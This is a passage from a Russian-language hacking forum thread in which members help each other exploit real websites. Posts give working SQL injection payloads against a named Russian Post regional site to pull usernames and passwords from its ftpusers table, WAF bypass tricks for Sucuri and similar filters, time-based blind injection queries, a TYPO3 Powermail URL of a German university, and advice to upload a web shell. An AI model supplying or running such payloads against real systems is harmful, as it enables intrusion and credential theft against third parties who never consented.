Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Помогите раскрутить)
    Code:
    http://www.hs-karlsruhe.de/studierende/career-services/existenzgruendung/umfrage-start-up/umfrageformular-start-up.html?tx_powermail_pi1%5Baction%5D=confirmation&tx_powermail_pi1[__referrer][@extension]=Powermail&tx_powermail_pi1[__trustedProperties]=a:2:{s:5:%22field%22;a:5:{s:6:%22UID332%22;i:1;s:6:%22UID333%22;i:1;s:6:%22UID338%22;i:1;s:6:%22UID334%22;i:1;s:4:%22__hp%22;i:1;}s:4:%22mail%22;a:1:{s:4:%22form%22;i:1;}}20cf2e8161f6dd6d8c7a69e5ca62625ea6a4f36a&tx_powermail_pi1[field][__hp]=&tx_powermail_pi1[mail][form]=55
    пробелы убрать
     
    #23941 DezMond™, 9 Mar 2015
    Last edited: 9 Mar 2015
  2. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    451
    Likes Received:
    264
    Reputations:
    40
    Подчисти сначала сам, прояви уважение.
    В этой лапше я так и не понял какие параметры не фильтруются.
     
    1 person likes this.
  3. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    урезал, см. тот же пост
     
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Дружище, что ты куришь?

    Как ??? Как ты ищешь такие сайты ???

    Это какой-то dork ??
     
    _________________________
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Такие сайты попадаются на typo3... что поделать-то(
     
    1 person likes this.
  6. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Здраствуйте. Помогите разобратся. Нашел скулю и все хорошо, нашел таблицу user, нашел в ней столбцы User, Password. Хочу вывести но когда сталю

    id=-561'+union+select+1,User,Password,4,5,6,7+FROM+user+--+

    ничего не выводить. Помогите, как зделать?
     
  7. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    захексить или зачарить, или добавить лимит, или заюзать что-то типа:
    INSERT(insert(table_schema,1,0,0x3a3a3a),1,0,tAble_Name)
    MAKE_SET(1|2,@@version,USER())
    EXPORT_SET(1,user(),version(),',',2)
    LPAD('Chat','8','Anti')
    или обойти WAF,например, если
    403: Access Forbidden
    Обходится элементарно с помощью "(" и ")", /**/, %0А, %0d, %09, %20 и т.д., или
    Sucuri WebSite Firewall - CloudProxy - Access Denied
    Обходится так: union/*123*/select
    и т.д.
    Короче, вобщем смотря по ситуации что там.
     
    #23947 Strilo4ka, 9 Mar 2015
    Last edited: 9 Mar 2015
  8. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    или поля пустые
     
    1 person likes this.
  9. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Может быть кодировка.
    concat_ws(0x3a,convert(user%20using%20utf8),convert(password%20using%20utf8))
     
    _________________________
  10. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Вот скуля

    www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,2,url,4,5,6,7+from+news--

    ничего не выводит, что тут делать?
     
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Дело в том, что надо указывать бд
    http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,2,url,4,5,6,7+from+konkurs.news--

    http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,User,Password,4,5,6,7+from+ftpusers.users--

    а вообще
    root
    mq off
     
    _________________________
    #23951 kingbeef, 10 Mar 2015
    Last edited: 10 Mar 2015
    1 person likes this.
  12. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    узнал бд. называется ufps. и подставляю, получается

    http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,User,Password,4,5,6,7+from+ufps.users--

    все равно ошибка, пожалуйста подскажите, что такое?
     
    #23952 teh, 10 Mar 2015
    Last edited: 10 Mar 2015
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    ufps это current_table. а тебе нужна база, в которой лежит таблица users. а лежит она в базе ftpusers
    Code:
    from ftpusers.users
     
    _________________________
  14. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    А как вы узнали что таблица лежить в базе ftpusers. Никак немогу понять, можете рассказать пожалуйста
     
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    либо почитай мануал, как узнать таблици и колонки в БД
    права БД рутовые, кавычки не фильтруются и не слешируются:
    вам остается только найти врайтабельную папку и залить шелл

    P.S: 2011 УФПС Волгоградской области
    - филиал ФГУП «Почта России»


    Помните об ответственности ломая подобные ресурсы!!!
     
    _________________________
    #23955 winstrool, 10 Mar 2015
    Last edited: 10 Mar 2015
  16. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Cпасибо парни, помогли

    P.S. Спасибо, забыл совсем про отвественость
     
  17. scr1m77

    scr1m77 Member

    Joined:
    29 Dec 2010
    Messages:
    2
    Likes Received:
    6
    Reputations:
    2
    Есть blind sql injection, как правильно узнать длинну получаймой колонки. Использую такой запрос:
    Code:
    SELECT IF (SUBSTRING(LENGTH(login),{x},1) = {y}, SLEEP(5), 0) FROM users LIMIT 1
    где {y} перебираймые значения "0,1,2,3,4,5,6,7,8,9"

    Проблема в том, что substring возвращает "0", когда положение {x} вышло за длинну записи. В итоге получается, что при попытке получить второе значение (x=2), а истинная длинна = 5, то получаем, что длинна колонки = 50.
    Собственно задача - правильно узнать длинну содержимого колонки, без лишних запросов.

    upd. Решено
     
    #23957 scr1m77, 10 Mar 2015
    Last edited: 11 Mar 2015
  18. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6

    может вместо login пехать что-нить такое: select column_name from information_schema.tables where table_name='users'
     
  19. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    есть тут что нибудь?
     
  20. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Есть, mssql-инъекция.
     
Thread Status:
Not open for further replies.